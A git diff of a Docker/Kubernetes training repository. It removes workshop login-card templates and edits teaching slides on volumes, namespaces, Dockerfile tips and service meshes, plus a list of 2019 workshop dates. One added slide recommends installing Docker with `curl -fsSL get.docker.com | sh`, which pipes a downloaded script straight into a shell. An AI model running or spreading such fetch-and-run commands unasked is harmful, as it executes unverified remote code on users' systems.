-body, table {
-    margin: 0;
-    padding: 0;
-    line-height: 1.0em;
-    font-size: 15px;
-    font-family: 'Slabo 27px';
-}
-
-table {
-    border-spacing: 0;
-    margin-top: 0.4em;
-    margin-bottom: 0.4em;
-    border-left: 0.8em double grey;
-    padding-left: 0.4em;
-}
-
-div {
-    float: left;
-    border: 1px dotted black;
-    height: 31%;
-    padding-top: 1%;
-    padding-bottom: 1%;
-    /* columns * (width+left+right) < 100% */
-    width: 30%;
-    padding-left: 1.5%;
-    padding-right: 1.5%;
-}
-
-div.back {
-	border: 1px dotted white;
-}
-
-div.back p {
-    margin: 0.5em 1em 0 1em;
-}
-
-p {
-    margin: 0.4em 0 0.8em 0;
-}
-
-img {
-    height: 5em;
-    float: right;
-    margin-right: 1em;
-}
-
-.logpass {
-    font-family: monospace;
-    font-weight: bold;
-}
-
-.pagebreak {
-    page-break-after: always;
-    clear: both;
-    display: block;
-    height: 8px;
-}
-</style></head>
-<body>
-{% for cluster in clusters %}
-    <div>
-
-        <p>
-            Here is the connection information to your very own
-            {{ cluster_or_machine }} for this {{ workshop_name }}.
-            You can connect to {{ this_or_each }} VM with any SSH client.
-        </p>
-        <p>
-            <img src="{{ image_src }}" />
-            <table>
-                <tr><td>login:</td></tr>
-                <tr><td class="logpass">docker</td></tr>
-                <tr><td>password:</td></tr>
-                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
-            </table>
-
-        </p>
-        <p>
-            Your {{ machine_is_or_machines_are }}:
-            <table>
-                {% for node in cluster %}
-                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
-                {% endfor %}
-            </table>
-        </p>
-        <p>You can find the slides at:
-            <center>{{ url }}</center>
-        </p>
-    </div>
-    {% if loop.index%pagesize==0 or loop.last %}
-        <span class="pagebreak"></span>
-	{% for x in range(pagesize) %}
-        <div class="back">
-        <br/>
-		<p>You got this at the workshop
-		"Getting Started With Kubernetes and Container Orchestration"
-		during QCON London (March 2019).</p>
-		<p>If you liked that workshop,
-		I can train your team or organization
-		on Docker, container, and Kubernetes,
-		with curriculums of 1 to 5 days.
-		</p>
-		<p>Interested? Contact me at:</p>
-		<p>jerome.petazzoni@gmail.com</p>
-		<p>Thank you!</p>
-        </div>
-	{% endfor %}
-	<span class="pagebreak"></span>
-    {% endif %}
-{% endfor %}
-</body>
-</html>
--- a/prepare-vms/templates/kube101.html
+++ b/prepare-vms/templates/kube101.html
@@ -1,106 +0,0 @@
-{# Feel free to customize or override anything in there! #}
-{%- set url = "http://container.training/" -%}
-{%- set pagesize = 12 -%}
-{%- if clustersize == 1 -%}
-    {%- set workshop_name = "Docker workshop" -%}
-    {%- set cluster_or_machine = "machine" -%}
-    {%- set this_or_each = "this" -%}
-    {%- set machine_is_or_machines_are = "machine is" -%}
-    {%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
-{%- else -%}
-    {%- set workshop_name = "Kubernetes workshop" -%}
-    {%- set cluster_or_machine = "cluster" -%}
-    {%- set this_or_each = "each" -%}
-    {%- set machine_is_or_machines_are = "machines are" -%}
-    {%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
-    {%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
-    {%- set image_src = image_src_kube -%}
-{%- endif -%}
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
-<html>
-<head><style>
-body, table {
-    margin: 0;
-    padding: 0;
-    line-height: 1em;
-    font-size: 14px;
-}
-
-table {
-    border-spacing: 0;
-    margin-top: 0.4em;
-    margin-bottom: 0.4em;
-    border-left: 0.8em double grey;
-    padding-left: 0.4em;
-}
-
-div {
-    float: left;
-    border: 1px dotted black;
-    padding-top: 1%;
-    padding-bottom: 1%;
-    /* columns * (width+left+right) < 100% */
-    width: 21.5%;
-    padding-left: 1.5%;
-    padding-right: 1.5%;
-}
-
-p {
-    margin: 0.4em 0 0.4em 0;
-}
-
-img {
-    height: 4em;
-    float: right;
-    margin-right: -0.4em;
-}
-
-.logpass {
-    font-family: monospace;
-    font-weight: bold;
-}
-
-.pagebreak {
-    page-break-after: always;
-    clear: both;
-    display: block;
-    height: 8px;
-}
-</style></head>
-<body>
-{% for cluster in clusters %}
-    {% if loop.index0>0 and loop.index0%pagesize==0 %}
-        <span class="pagebreak"></span>
-    {% endif %}
-    <div>
-
-        <p>
-            Here is the connection information to your very own
-            {{ cluster_or_machine }} for this {{ workshop_name }}.
-            You can connect to {{ this_or_each }} VM with any SSH client.
-        </p>
-        <p>
-            <img src="{{ image_src }}" />
-            <table>
-                <tr><td>login:</td></tr>
-                <tr><td class="logpass">docker</td></tr>
-                <tr><td>password:</td></tr>
-                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
-            </table>
-
-        </p>
-        <p>
-            Your {{ machine_is_or_machines_are }}:
-            <table>
-                {% for node in cluster %}
-                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
-                {% endfor %}
-            </table>
-        </p>
-        <p>You can find the slides at:
-            <center>{{ url }}</center>
-        </p>
-    </div>
-{% endfor %}
-</body>
-</html>
--- a/slides/Dockerfile
+++ b/slides/Dockerfile
@@ -1,7 +1,4 @@
-FROM alpine
-RUN apk update
-RUN apk add entr
-RUN apk add py-pip
-RUN apk add git
+FROM alpine:3.9
+RUN apk add --no-cache entr py-pip git
 COPY requirements.txt .
 RUN pip install -r requirements.txt
--- a/slides/_redirects
+++ b/slides/_redirects
@@ -2,4 +2,6 @@
 #/ /kube-halfday.yml.html 200
 #/ /kube-fullday.yml.html 200
 #/ /kube-twodays.yml.html 200
-/ /intro-fullday.yml.html 200!
+
+# And this makes it possible to run "git clone https://container.training".
+/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack
--- a/slides/containers/Ambassadors.md
+++ b/slides/containers/Ambassadors.md
@@ -150,7 +150,7 @@ Different deployments will use different underlying technologies.
 * Ad-hoc deployments can use a master-less discovery protocol
  like avahi to register and discover services.
 * It is also possible to do one-shot reconfiguration of the
-  ambassadors. It is slightly less dynamic but has much less
+  ambassadors. It is slightly less dynamic but has far fewer
  requirements.
 * Ambassadors can be used in addition to, or instead of, overlay networks.

@@ -186,22 +186,48 @@ Different deployments will use different underlying technologies.

 ---

-## Section summary
+## Some popular service meshes

-We've learned how to:
+... And related projects:

-* Understand the ambassador pattern and what it is used for (service portability).
-
-For more information about the ambassador pattern, including demos on Swarm and ECS: 
-
-* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
-
-* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
-
-Some services meshes and related projects:
-
-* [Istio](https://istio.io/)
-
-* [Linkerd](https://linkerd.io/)
+* [Consul Connect](https://www.consul.io/docs/connect/index.html)
+  <br/>
+  Transparently secures service-to-service connections with mTLS.

 * [Gloo](https://gloo.solo.io/)
+  <br/>
+  API gateway that can interconnect applications on VMs, containers, and serverless.
+
+* [Istio](https://istio.io/)
+  <br/>
+  A popular service mesh.
+
+* [Linkerd](https://linkerd.io/)
+  <br/>
+  Another popular service mesh.
+
+---
+
+## Learning more about service meshes
+
+A few blog posts about service meshes:
+
+* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
+  <br/>
+  Provides historical context: how did we manage before service meshes were invented?
+
+* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
+  <br/>
+  Explains the purpose of service meshes. Illustrates some NGINX features.
+
+* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
+  <br/>
+  Includes high-level overview and definitions.
+
+* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
+  <br/>
+  Includes a step-by-step demo of Linkerd.
+
+And a video:
+
+* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
--- a/slides/containers/Application_Configuration.md
+++ b/slides/containers/Application_Configuration.md
@@ -98,13 +98,13 @@ COPY prometheus.conf /etc

 * Allows arbitrary customization and complex configuration files.

-* Requires to write a configuration file. (Obviously!)
+* Requires writing a configuration file. (Obviously!)

-* Requires to build an image to start the service.
+* Requires building an image to start the service.

-* Requires to rebuild the image to reconfigure the service.
+* Requires rebuilding the image to reconfigure the service.

-* Requires to rebuild the image to upgrade the service.
+* Requires rebuilding the image to upgrade the service.

 * Configured images can be stored in registries.

@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp

 * Allows arbitrary customization and complex configuration files.

-* Requires to create a volume for each different configuration.
+* Requires creating a volume for each different configuration.

 * Services with identical configurations can use the same volume.

-* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
+* Doesn't require building / rebuilding an image when upgrading / reconfiguring.

 * Configuration can be generated or edited through another container.

@@ -198,4 +198,4 @@ E.g.:

 - read the secret on stdin when the service starts,

- pass the secret using an API endpoint.
+- pass the secret using an API endpoint.
--- a/slides/containers/Background_Containers.md
+++ b/slides/containers/Background_Containers.md
@@ -257,7 +257,7 @@ $ docker kill 068 57ad
 The `stop` and `kill` commands can take multiple container IDs.

 Those containers will be terminated immediately (without
-the 10 seconds delay).
+the 10-second delay).

 Let's check that our containers don't show up anymore:

--- a/slides/containers/Cmd_And_Entrypoint.md
+++ b/slides/containers/Cmd_And_Entrypoint.md
@@ -222,16 +222,16 @@ CMD ["hello world"]
 Let's build it:

 ```bash
-$ docker build -t figlet .
+$ docker build -t myfiglet .
 ...
 Successfully built 6e0b6a048a07
-Successfully tagged figlet:latest
+Successfully tagged myfiglet:latest
 ```

 Run it without parameters:

 ```bash
-$ docker run figlet
+$ docker run myfiglet
 _          _   _                             _        
 | |        | | | |                           | |    |  
 | |     _  | | | |  __             __   ,_   | |  __|  
@@ -246,7 +246,7 @@ $ docker run figlet
 Now let's pass extra arguments to the image.

 ```bash
-$ docker run figlet hola mundo
+$ docker run myfiglet hola mundo
 _           _                                               
 | |         | |                                      |       
 | |     __  | |  __,     _  _  _           _  _    __|   __  
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.

 What if we want to run a shell in our container?

-We cannot just do `docker run figlet bash` because
+We cannot just do `docker run myfiglet bash` because
 that would just tell figlet to display the word "bash."

 We use the `--entrypoint` parameter:

 ```bash
-$ docker run -it --entrypoint bash figlet
+$ docker run -it --entrypoint bash myfiglet
 root@6027e44e2955:/# 
 ```

--- a/slides/containers/Container_Engines.md
+++ b/slides/containers/Container_Engines.md
@@ -86,7 +86,7 @@ like Windows, macOS, Solaris, FreeBSD ...

 * No notion of image (container filesystems have to be managed manually).

-* Networking has to be setup manually.
+* Networking has to be set up manually.

 ---

@@ -112,7 +112,7 @@ like Windows, macOS, Solaris, FreeBSD ...

 * Strong emphasis on security (through privilege separation).

-* Networking has to be setup separately (e.g. through CNI plugins).
+* Networking has to be set up separately (e.g. through CNI plugins).

 * Partial image management (pull, but no push).

@@ -152,7 +152,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).

 * Basic image support (tar archives and raw disk images).

-* Network has to be setup manually.
+* Network has to be set up manually.

 ---

@@ -164,7 +164,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).

 * Run each container in a lightweight virtual machine.

-* Requires to run on bare metal *or* with nested virtualization.
+* Requires running on bare metal *or* with nested virtualization.

 ---

--- a/slides/containers/Container_Network_Model.md
+++ b/slides/containers/Container_Network_Model.md
@@ -474,7 +474,7 @@ When creating a network, extra options can be provided.

 * `--ip-range` (in CIDR notation) indicates the subnet to allocate from.

-* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
+* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).

 ---

@@ -528,7 +528,9 @@ Very short instructions:
 - `docker network create mynet --driver overlay`
 - `docker service create --network mynet myimage`

-See https://jpetazzo.github.io/container.training for all the deets about clustering!
+If you want to learn more about Swarm mode, you can check
+[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
+or [these slides](https://container.training/swarm-selfpaced.yml.html).

 ---

@@ -554,7 +556,7 @@ General idea:

 * So far, we have specified which network to use when starting the container.

-* The Docker Engine also allows to connect and disconnect while the container runs.
+* The Docker Engine also allows connecting and disconnecting while the container is running.

 * This feature is exposed through the Docker API, and through two Docker CLI commands:

--- a/slides/containers/Dockerfile_Tips.md
+++ b/slides/containers/Dockerfile_Tips.md
@@ -76,6 +76,78 @@ CMD ["python", "app.py"]

 ---

+## Be careful with `chown`, `chmod`, `mv`
+
+* Layers cannot efficiently store changes in permissions or ownership.
+
+* Layers cannot efficiently represent a file being moved, either.
+
+* As a result, operations like `chown`, `chmod`, `mv` can be expensive.
+
+* For instance, in the Dockerfile snippet below, each `RUN` line
+  creates a layer with an entire copy of `some-file`.
+
+  ```dockerfile
+  COPY some-file .
+  RUN chown www-data:www-data some-file
+  RUN chmod 644 some-file
+  RUN mv some-file /var/www
+  ```
+
+* How can we avoid that?
+
+---
+
+## Put files in the right place
+
+* Instead of using `mv`, put files directly in the right place.
+
+* When extracting archives (tar, zip...), merge operations in a single layer.
+
+  Example:
+
+  ```dockerfile
+  ...
+  RUN wget http://.../foo.tar.gz \
+   && tar -zxf foo.tar.gz \
+   && mv foo/fooctl /usr/local/bin \
+   && rm -rf foo
+  ...
+  ```
+
+---
+
+## Use `COPY --chown`
+
+* The Dockerfile instruction `COPY` can take a `--chown` parameter.
+
+  Examples:
+
+  ```dockerfile
+  ...
+  COPY --chown=1000 some-file .
+  COPY --chown=1000:1000 some-file .
+  COPY --chown=www-data:www-data some-file .
+  ```
+
+* The `--chown` flag can specify a user, or a user:group pair.
+
+* The user and group can be specified as names or numbers.
+
+* When using names, the names must exist in `/etc/passwd` or `/etc/group`.
+
+  *(In the container, not on the host!)*
+
+---
+
+## Set correct permissions locally
+
+* Instead of using `chmod`, set the right file permissions locally.
+
+* When files are copied with `COPY`, permissions are preserved.
+
+---
+
 ## Embedding unit tests in the build process

 ```dockerfile
--- a/slides/containers/Exercise_Composefile.md
+++ b/slides/containers/Exercise_Composefile.md
@@ -0,0 +1,5 @@
+# Exercise — writing a Compose file
+
+Let's write a Compose file for the wordsmith app!
+
+The code is at: https://github.com/jpetazzo/wordsmith
--- a/slides/containers/Exercise_Dockerfile_Advanced.md
+++ b/slides/containers/Exercise_Dockerfile_Advanced.md
@@ -0,0 +1,9 @@
+# Exercise — writing better Dockerfiles
+
+Let's update our Dockerfiles to leverage multi-stage builds!
+
+The code is at: https://github.com/jpetazzo/wordsmith
+
+Use a different tag for these images, so that we can compare their sizes.
+
+What's the size difference between single-stage and multi-stage builds?
--- a/slides/containers/Exercise_Dockerfile_Basic.md
+++ b/slides/containers/Exercise_Dockerfile_Basic.md
@@ -0,0 +1,5 @@
+# Exercise — writing Dockerfiles
+
+Let's write Dockerfiles for an existing application!
+
+The code is at: https://github.com/jpetazzo/wordsmith
--- a/slides/containers/First_Containers.md
+++ b/slides/containers/First_Containers.md
@@ -203,4 +203,90 @@ bash: figlet: command not found

 * The basic Ubuntu image was used, and `figlet` is not here.

-* We will see in the next chapters how to bake a custom image with `figlet`.
+---
+
+## Where's my container?
+
+* Can we reuse that container that we took time to customize?
+
+  *We can, but that's not the default workflow with Docker.*
+
+* What's the default workflow, then?
+
+  *Always start with a fresh container.*
+  <br/>
+  *If we need something installed in our container, build a custom image.*
+
+* That seems complicated!
+
+  *We'll see that it's actually pretty easy!*
+
+* And what's the point?
+
+  *This puts a strong emphasis on automation and repeatability. Let's see why ...*
+
+---
+
+## Pets vs. Cattle
+
+* In the "pets vs. cattle" metaphor, there are two kinds of servers.
+
+* Pets:
+
+  * have distinctive names and unique configurations
+
+  * when they have an outage, we do everything we can to fix them
+
+* Cattle:
+
+  * have generic names (e.g. with numbers) and generic configuration
+
+  * configuration is enforced by configuration management, golden images ...
+
+  * when they have an outage, we can replace them immediately with a new server
+
+* What's the connection with Docker and containers?
+
+---
+
+## Local development environments
+
+* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
+
+  * create VM from base template (Ubuntu, CentOS...)
+
+  * install packages, set up environment
+
+  * work on project
+
+  * when done, shut down VM
+
+  * next time we need to work on project, restart VM as we left it
+
+  * if we need to tweak the environment, we do it live
+
+* Over time, the VM configuration evolves, diverges.
+
+* We don't have a clean, reliable, deterministic way to provision that environment.
+
+---
+
+## Local development with Docker
+
+* With Docker, the workflow looks like this:
+
+  * create container image with our dev environment
+
+  * run container with that image
+
+  * work on project
+
+  * when done, shut down container
+
+  * next time we need to work on project, start a new container
+
+  * if we need to tweak the environment, we create a new image
+
+* We have a clear definition of our environment, and can share it reliably with others.
+
+* Let's see in the next chapters how to bake a custom image with `figlet`!
--- a/slides/containers/Initial_Images.md
+++ b/slides/containers/Initial_Images.md
@@ -70,8 +70,9 @@ class: pic

 * An image is a read-only filesystem.

-* A container is an encapsulated set of processes running in a
-  read-write copy of that filesystem.
+* A container is an encapsulated set of processes,
+
+  running in a read-write copy of that filesystem.

 * To optimize container boot time, *copy-on-write* is used
  instead of regular copy.
@@ -177,8 +178,11 @@ Let's explain each of them.

 ## Root namespace

-The root namespace is for official images. They are put there by Docker Inc.,
-but they are generally authored and maintained by third parties.
+The root namespace is for official images.
+
+They are gated by Docker Inc.
+
+They are generally authored and maintained by third parties.

 Those images include:

@@ -188,7 +192,7 @@ Those images include:

 * Ready-to-use components and services, like redis, postgresql...

-* Over 130 at this point!
+* Over 150 at this point!

 ---

--- a/slides/containers/Installing_Docker.md
+++ b/slides/containers/Installing_Docker.md
@@ -38,11 +38,7 @@ We can arbitrarily distinguish:

 ## Installing Docker on Linux

-* The recommended method is to install the packages supplied by Docker Inc.:
-
-  https://store.docker.com
-
-* The general method is:
+* The recommended method is to install the packages supplied by Docker Inc.:

  - add Docker Inc.'s package repositories to your system configuration

@@ -56,6 +52,12 @@ We can arbitrarily distinguish:

  https://docs.docker.com/engine/installation/linux/docker-ce/binaries/

+* To quickly set up a dev environment, Docker provides a convenience install script:
+
+  ```bash
+  curl -fsSL get.docker.com | sh
+  ```
+
 ---

 class: extra-details
--- a/slides/containers/Local_Development_Workflow.md
+++ b/slides/containers/Local_Development_Workflow.md
@@ -156,7 +156,7 @@ Option 3:

 * Use a *volume* to mount local files into the container
 * Make changes locally
-* Changes are reflected into the container
+* Changes are reflected in the container

 ---

@@ -176,7 +176,7 @@ $ docker run -d -v $(pwd):/src -P namer

 * `namer` is the name of the image we will run.

-* We don't specify a command to run because it is already set in the Dockerfile.
+* We don't specify a command to run because it is already set in the Dockerfile via `CMD`.

 Note: on Windows, replace `$(pwd)` with `%cd%` (or `${pwd}` if you use PowerShell).

@@ -192,7 +192,7 @@ The flag structure is:
 [host-path]:[container-path]:[rw|ro]
 ```

-* If `[host-path]` or `[container-path]` doesn't exist it is created.
+* `[host-path]` and `[container-path]` are created if they don't exist.

 * You can control the write status of the volume with the `ro` and
  `rw` options.
@@ -255,13 +255,13 @@ color: red;

 * Volumes are *not* copying or synchronizing files between the host and the container.

-* Volumes are *bind mounts*: a kernel mechanism associating a path to another.
+* Volumes are *bind mounts*: a kernel mechanism associating one path with another.

 * Bind mounts are *kind of* similar to symbolic links, but at a very different level.

 * Changes made on the host or on the container will be visible on the other side.

-  (Since under the hood, it's the same file on both anyway.)
+  (Under the hood, it's the same file anyway.)

 ---

@@ -273,7 +273,7 @@ by Chad Fowler, where he explains the concept of immutable infrastructure.)*

 --

-* Let's mess up majorly with our container.
+* Let's majorly mess up our container.

  (Remove files or whatever.)

@@ -319,7 +319,7 @@ and *canary deployments*.
   <br/>
   Use the `-v` flag to mount our source code inside the container.

-3. Edit the source code outside the containers, using regular tools.
+3. Edit the source code outside the container, using familiar tools.
   <br/>
   (vim, emacs, textmate...)

--- a/slides/containers/Namespaces_Cgroups.md
+++ b/slides/containers/Namespaces_Cgroups.md
@@ -86,13 +86,13 @@ class: extra-details, deep-dive

  - the `unshare()` system call.

- The Linux tool `unshare` allows to do that from a shell.
+- The Linux tool `unshare` allows doing that from a shell.

 - A new process can re-use none / all / some of the namespaces of its parent.

 - It is possible to "enter" a namespace with the `setns()` system call.

- The Linux tool `nsenter` allows to do that from a shell.
+- The Linux tool `nsenter` allows doing that from a shell.

 ---

@@ -138,11 +138,11 @@ class: extra-details, deep-dive

 - gethostname / sethostname

- Allows to set a custom hostname for a container.
+- Allows setting a custom hostname for a container.

 - That's (mostly) it!

- Also allows to set the NIS domain.
+- Also allows setting the NIS domain.

  (If you don't know what a NIS domain is, you don't have to worry about it!)

@@ -392,13 +392,13 @@ class: extra-details

 - Processes can have their own root fs (à la chroot).

- Processes can also have "private" mounts. This allows to:
+- Processes can also have "private" mounts. This allows:

-  - isolate `/tmp` (per user, per service...)
+  - isolating `/tmp` (per user, per service...)

-  - mask `/proc`, `/sys` (for processes that don't need them)
+  - masking `/proc`, `/sys` (for processes that don't need them)

-  - mount remote filesystems or sensitive data,
+  - mounting remote filesystems or sensitive data,
    <br/>but make it visible only for allowed processes

 - Mounts can be totally private, or shared.
@@ -570,7 +570,7 @@ Check `man 2 unshare` and `man pid_namespaces` if you want more details.

 ## User namespace

- Allows to map UID/GID; e.g.:
+- Allows mapping UID/GID; e.g.:

  - UID 0→1999 in container C1 is mapped to UID 10000→11999 on host
  - UID 0→1999 in container C2 is mapped to UID 12000→13999 on host
@@ -947,7 +947,7 @@ Killed

  (i.e., "this group of process used X seconds of CPU0 and Y seconds of CPU1".)

- Allows to set relative weights used by the scheduler.
+- Allows setting relative weights used by the scheduler.

 ---

@@ -1101,9 +1101,9 @@ See `man capabilities` for the full list and details.

 - Original seccomp only allows `read()`, `write()`, `exit()`, `sigreturn()`.

- The seccomp-bpf extension allows to specify custom filters with BPF rules.
+- The seccomp-bpf extension allows specifying custom filters with BPF rules.

- This allows to filter by syscall, and by parameter.
+- This allows filtering by syscall, and by parameter.

 - BPF code can perform arbitrarily complex checks, quickly, and safely.

--- a/slides/containers/Orchestration_Overview.md
+++ b/slides/containers/Orchestration_Overview.md
@@ -6,8 +6,6 @@ In this chapter, we will:

 * Present (from a high-level perspective) some orchestrators.

-* Show one orchestrator (Kubernetes) in action.
-
 ---

 class: pic
@@ -121,7 +119,7 @@ Now, how are things for our IAAS provider?
 - Solution: *migrate* VMs and shutdown empty servers
  
  (e.g. combine two hypervisors with 40% load into 80%+0%,
-  <br/>and shutdown the one at 0%)
+  <br/>and shut down the one at 0%)

 ---

@@ -129,7 +127,7 @@ Now, how are things for our IAAS provider?

 How do we implement this?

- Shutdown empty hosts (but keep some spare capacity)
+- Shut down empty hosts (but keep some spare capacity)

 - Start hosts again when capacity gets low

@@ -177,7 +175,7 @@ In practice, these goals often conflict.

  - 16 GB RAM, 8 cores, 1 TB disk

- Each week, your team asks:
+- Each week, your team requests:

  - one VM with X RAM, Y CPU, Z disk

--- a/slides/containers/Resource_Limits.md
+++ b/slides/containers/Resource_Limits.md
@@ -72,7 +72,7 @@

 - For memory usage, the mechanism is part of the *cgroup* subsystem.

- This subsystem allows to limit the memory for a process or a group of processes.
+- This subsystem allows limiting the memory for a process or a group of processes.

 - A container engine leverages these mechanisms to limit memory for a container.

--- a/slides/containers/Training_Environment.md
+++ b/slides/containers/Training_Environment.md
@@ -45,13 +45,13 @@ individual Docker VM.*

 - The Docker Engine is a daemon (a service running in the background).

- This daemon manages containers, the same way that an hypervisor manages VMs.
+- This daemon manages containers, the same way that a hypervisor manages VMs.

 - We interact with the Docker Engine by using the Docker CLI.

 - The Docker CLI and the Docker Engine communicate through an API.

- There are many other programs, and many client libraries, to use that API.
+- There are many other programs and client libraries which use that API.

 ---

--- a/slides/containers/Working_With_Volumes.md
+++ b/slides/containers/Working_With_Volumes.md
@@ -33,13 +33,13 @@ Docker volumes can be used to achieve many things, including:

 * Sharing a *single file* between the host and a container.

-* Using remote storage and custom storage with "volume drivers".
+* Using remote storage and custom storage with *volume drivers*.

 ---

 ## Volumes are special directories in a container

-Volumes can be declared in two different ways.
+Volumes can be declared in two different ways:

 * Within a `Dockerfile`, with a `VOLUME` instruction.

@@ -163,7 +163,7 @@ Volumes are not anchored to a specific path.

 * Volumes are used with the `-v` option.

-* When a host path does not contain a /, it is considered to be a volume name.
+* When a host path does not contain a `/`, it is considered a volume name.

 Let's start a web server using the two previous volumes.

@@ -189,7 +189,7 @@ $ curl localhost:1234

 * In this example, we will run a text editor in the other container.

-  (But this could be a FTP server, a WebDAV server, a Git receiver...)
+  (But this could be an FTP server, a WebDAV server, a Git receiver...)

 Let's start another container using the `webapps` volume.

--- a/slides/images/kubectl-run-slideshow/01.svg
+++ b/slides/images/kubectl-run-slideshow/01.svg
--- a/slides/images/kubectl-run-slideshow/02.svg
+++ b/slides/images/kubectl-run-slideshow/02.svg
--- a/slides/images/kubectl-run-slideshow/03.svg
+++ b/slides/images/kubectl-run-slideshow/03.svg
--- a/slides/images/kubectl-run-slideshow/04.svg
+++ b/slides/images/kubectl-run-slideshow/04.svg
--- a/slides/images/kubectl-run-slideshow/05.svg
+++ b/slides/images/kubectl-run-slideshow/05.svg
--- a/slides/images/kubectl-run-slideshow/06.svg
+++ b/slides/images/kubectl-run-slideshow/06.svg
--- a/slides/images/kubectl-run-slideshow/07.svg
+++ b/slides/images/kubectl-run-slideshow/07.svg
--- a/slides/images/kubectl-run-slideshow/08.svg
+++ b/slides/images/kubectl-run-slideshow/08.svg
--- a/slides/images/kubectl-run-slideshow/09.svg
+++ b/slides/images/kubectl-run-slideshow/09.svg
--- a/slides/images/kubectl-run-slideshow/10.svg
+++ b/slides/images/kubectl-run-slideshow/10.svg
--- a/slides/images/kubectl-run-slideshow/11.svg
+++ b/slides/images/kubectl-run-slideshow/11.svg
--- a/slides/images/kubectl-run-slideshow/12.svg
+++ b/slides/images/kubectl-run-slideshow/12.svg
--- a/slides/images/kubectl-run-slideshow/13.svg
+++ b/slides/images/kubectl-run-slideshow/13.svg
--- a/slides/images/kubectl-run-slideshow/14.svg
+++ b/slides/images/kubectl-run-slideshow/14.svg
--- a/slides/images/kubectl-run-slideshow/15.svg
+++ b/slides/images/kubectl-run-slideshow/15.svg
--- a/slides/images/kubectl-run-slideshow/16.svg
+++ b/slides/images/kubectl-run-slideshow/16.svg
--- a/slides/images/kubectl-run-slideshow/17.svg
+++ b/slides/images/kubectl-run-slideshow/17.svg
--- a/slides/images/kubectl-run-slideshow/18.svg
+++ b/slides/images/kubectl-run-slideshow/18.svg
--- a/slides/images/kubectl-run-slideshow/19.svg
+++ b/slides/images/kubectl-run-slideshow/19.svg
--- a/slides/index.yaml
+++ b/slides/index.yaml
@@ -1,3 +1,55 @@
+- date: [2019-11-04, 2019-11-05]
+  country: de
+  city: Berlin
+  event: Velocity
+  speaker: jpetazzo
+  title: Deploying and scaling applications with Kubernetes
+  attend: https://conferences.oreilly.com/velocity/vl-eu/public/schedule/detail/79109
+
+- date: 2019-11-13
+  country: fr
+  city: Marseille
+  event: DevopsDDay
+  speaker: jpetazzo
+  title: Déployer ses applications avec Kubernetes (in French)
+  lang: fr
+  attend: http://2019.devops-dday.com/Workshop.html
+
+- date: [2019-09-24, 2019-09-25]
+  country: fr
+  city: Paris
+  event: ENIX SAS
+  speaker: jpetazzo
+  title: Déployer ses applications avec Kubernetes (in French)
+  lang: fr
+  attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
+
+- date: 2019-07-16
+  country: us
+  city: Portland, OR
+  event: OSCON
+  speaker: bridgetkromhout
+  title: "Kubernetes 201: Production tooling"
+  attend: https://conferences.oreilly.com/oscon/oscon-or/public/schedule/detail/76390
+  slides: https://oscon2019.container.training
+
+- date: 2019-06-17
+  country: ca
+  city: Montréal
+  event: Zenika
+  speaker: jpetazzo
+  title: Getting Started With Kubernetes
+  attend: https://www.eventbrite.com/e/getting-started-with-kubernetes-1-day-en-tickets-61658444066
+
+- date: [2019-06-10, 2019-06-11]
+  city: San Jose, CA
+  country: us
+  event: Velocity
+  title: Kubernetes for administrators and operators
+  speaker: jpetazzo
+  attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
+  slides: https://kadm-2019-06.container.training/
+
 - date: 2019-05-01
  country: us
  city: Cleveland, OH
@@ -5,6 +57,8 @@
  speaker: jpetazzo, s0ulshake
  title: Getting started with Kubernetes and container orchestration
  attend: https://us.pycon.org/2019/schedule/presentation/74/
+  slides: https://pycon2019.container.training/
+  video: https://www.youtube.com/watch?v=J08MrW2NC1Y

 - date: 2019-04-28
  country: us
@@ -13,15 +67,26 @@
  speaker: jpetazzo
  title: Getting Started With Kubernetes and Container Orchestration
  attend: https://gotochgo.com/2019/workshops/148
+  slides: https://gotochgo2019.container.training/
+
+- date: 2019-04-26
+  country: fr
+  city: Paris
+  event: ENIX SAS
+  speaker: jpetazzo
+  title: Opérer et administrer Kubernetes
+  attend: https://enix.io/fr/services/formation/operer-et-administrer-kubernetes/
+  slides: https://kadm-2019-04.container.training/

 - date: [2019-04-23, 2019-04-24]
  country: fr
  city: Paris
  event: ENIX SAS
-  speaker: "jpetazzo, rdegez"
+  speaker: jpetazzo
  title: Déployer ses applications avec Kubernetes (in French)
  lang: fr
  attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
+  slides: https://kube-2019-04.container.training/

 - date: [2019-04-15, 2019-04-16]
  country: fr
@@ -31,6 +96,7 @@
  title: Bien démarrer avec les conteneurs (in French)
  lang: fr
  attend: https://enix.io/fr/services/formation/bien-demarrer-avec-les-conteneurs/
+  slides: http://intro-2019-04.container.training/

 - date: 2019-03-08
  country: uk
